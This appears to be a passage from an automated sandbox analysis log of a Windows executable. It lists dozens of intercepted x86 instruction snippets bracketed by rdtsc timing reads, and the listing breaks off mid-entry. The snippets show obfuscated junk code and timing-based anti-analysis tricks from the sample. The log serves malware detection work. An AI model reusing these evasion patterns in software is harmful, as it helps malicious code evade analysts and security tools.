Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCD098 second address: BCD0A2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFB28B7466Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCD0A2 second address: BCD0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007FFB28DE2A06h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCD765 second address: BCD76B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCD76B second address: BCD76F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF30E second address: BCF313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF313 second address: BCF343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jmp 00007FFB28DE2A0Dh 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF343 second address: BCF358 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FFB28B7466Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF358 second address: BCF35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF35C second address: BCF366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FFB28B74666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF366 second address: BCF36A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF36A second address: BCF382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FFB28B7466Ch 0x00000012 jno 00007FFB28B74666h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF382 second address: BCF3B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFB28DE2A10h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFB28DE2A16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF3B6 second address: BCF3C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FFB28B74666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF8FC second address: BCF91A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF91A second address: BCF91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF91E second address: BCF924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCF9FB second address: BCFA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD0443 second address: BD0447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD131D second address: BD1331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jns 00007FFB28B74666h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD1331 second address: BD1335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD1335 second address: BD1355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFB28B7466Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD240D second address: BD2411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD2411 second address: BD241F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFB28B7466Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD2EC6 second address: BD2F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movzx esi, cx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FFB28DE2A08h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 sub esi, dword ptr [ebp+12A31CDAh] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FFB28DE2A08h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+12A33686h], ebx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD2F3A second address: BD2F55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD3A02 second address: BD3A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD43D5 second address: BD43DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD567C second address: BD5683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD60FB second address: BD6108 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFB28B74666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD6108 second address: BD6119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jp 00007FFB28DE2A06h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BDAF98 second address: BDAFC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007FFB28B74679h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD6119 second address: BD6131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BDBDE1 second address: BDBDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BDDCEE second address: BDDCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jg 00007FFB28DE2A06h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BDDDA1 second address: BDDDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BDCEAE second address: BDCEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FFB28DE2A06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BDCF86 second address: BDCF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BDDFC2 second address: BDDFCC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFB28DE2A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BDFC54 second address: BDFC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFB28B74666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE2C40 second address: BE2C64 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007FFB28DE2A06h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFB28DE2A15h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE5E97 second address: BE5EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFB28B74666h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE6E99 second address: BE6E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE6E9E second address: BE6EC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFB28B7466Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE2DF0 second address: BE2DFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE3F9C second address: BE3FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE2DFE second address: BE2E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE7F91 second address: BE7F96 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE2E02 second address: BE2E0F instructions: 0x00000000 rdtsc 0x00000002 je 00007FFB28DE2A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE4FE3 second address: BE4FED instructions: 0x00000000 rdtsc 0x00000002 js 00007FFB28B7466Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE1E67 second address: BE1E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFB28DE2A0Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE7F96 second address: BE7FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+12A32BF9h] 0x00000010 push 00000000h 0x00000012 mov ebx, dword ptr [ebp+12A32A99h] 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+12A3380Ch] 0x00000020 push eax 0x00000021 je 00007FFB28B7466Eh 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE5FA4 second address: BE5FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE5FBC second address: BE5FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE8EA1 second address: BE8EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push edx 0x0000000a mov edi, 4909DD42h 0x0000000f pop edi 0x00000010 push 00000000h 0x00000012 sub bx, A876h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FFB28DE2A08h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 call 00007FFB28DE2A0Dh 0x00000038 mov dword ptr [ebp+12A32508h], edi 0x0000003e pop edi 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 push edx 0x00000043 jc 00007FFB28DE2A06h 0x00000049 pop edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE6FE2 second address: BE7067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp], eax 0x0000000b jng 00007FFB28B74671h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 movzx ebx, dx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, 4E62A1F9h 0x00000027 mov eax, dword ptr [ebp+12A30519h] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FFB28B74668h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 and bx, DA12h 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+12A32C11h] 0x00000054 nop 0x00000055 push eax 0x00000056 jng 00007FFB28B74671h 0x0000005c pop eax 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FFB28B7466Ch 0x00000065 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE914E second address: BE9153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BEE808 second address: BEE811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BEE811 second address: BEE817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BEE817 second address: BEE81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BEE81C second address: BEE854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FFB28DE2A0Ah 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FFB28DE2A14h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96B9B second address: B96B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96B9F second address: B96BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FFB28DE2A06h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96BB0 second address: B96BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96BB5 second address: B96C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FFB28DE2A06h 0x00000009 jmp 00007FFB28DE2A11h 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FFB28DE2A10h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FFB28DE2A15h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 push esi 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96C03 second address: B96C0F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFB28B74666h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B96C0F second address: B96C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF50F1 second address: BF50F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF50F8 second address: BF5100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF5100 second address: BF5104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF486F second address: BF4875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4875 second address: BF487B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A0B second address: BF4A20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FFB28DE2A06h 0x0000000d jbe 00007FFB28DE2A06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A20 second address: BF4A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A26 second address: BF4A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jc 00007FFB28DE2A0Ch 0x0000000c jno 00007FFB28DE2A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A3C second address: BF4A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4A42 second address: BF4A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4CB7 second address: BF4CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4CBD second address: BF4CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007FFB28DE2A0Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4CD2 second address: BF4CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FFB28B74666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF4CDD second address: BF4CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF9746 second address: BF974D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF99B7 second address: BF99BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF99BB second address: BF99C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BF99C1 second address: A20AC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28DE2A13h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jmp 00007FFB28DE2A13h 0x00000010 push dword ptr [ebp+12A311D5h] 0x00000016 jne 00007FFB28DE2A0Dh 0x0000001c call dword ptr [ebp+12A31D0Ah] 0x00000022 pushad 0x00000023 mov dword ptr [ebp+12A31971h], eax 0x00000029 xor eax, eax 0x0000002b jmp 00007FFB28DE2A0Eh 0x00000030 sub dword ptr [ebp+12A31971h], edi 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a sub dword ptr [ebp+12A31971h], ebx 0x00000040 mov dword ptr [ebp+12A32AD5h], eax 0x00000046 pushad 0x00000047 or ecx, dword ptr [ebp+12A32B21h] 0x0000004d sub ecx, dword ptr [ebp+12A32C19h] 0x00000053 popad 0x00000054 mov esi, 0000003Ch 0x00000059 jmp 00007FFB28DE2A14h 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jmp 00007FFB28DE2A15h 0x00000067 lodsw 0x00000069 cmc 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e jmp 00007FFB28DE2A0Fh 0x00000073 mov dword ptr [ebp+12A31971h], ebx 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d pushad 0x0000007e mov ebx, dword ptr [ebp+12A32C3Dh] 0x00000084 adc edi, 7DC0B4F0h 0x0000008a popad 0x0000008b nop 0x0000008c push ebx 0x0000008d jg 00007FFB28DE2A12h 0x00000093 pop ebx 0x00000094 push eax 0x00000095 pushad 0x00000096 push eax 0x00000097 push edx 